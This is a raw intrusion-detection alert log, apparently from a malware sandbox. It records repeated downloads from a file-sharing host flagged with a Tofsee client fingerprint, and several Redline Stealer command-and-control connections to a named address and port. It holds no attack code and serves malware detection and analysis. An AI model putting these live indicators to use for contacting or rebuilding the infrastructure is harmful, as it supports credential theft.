TCP 192.168.56.101:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49392 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49393 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49396 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49433 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49443 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49444 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49427 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49367 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49431 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49369 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49447 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49379 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49465 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49384 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49470 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49466 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49467 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49479 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49456 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49468 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49495 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49475 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49233 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
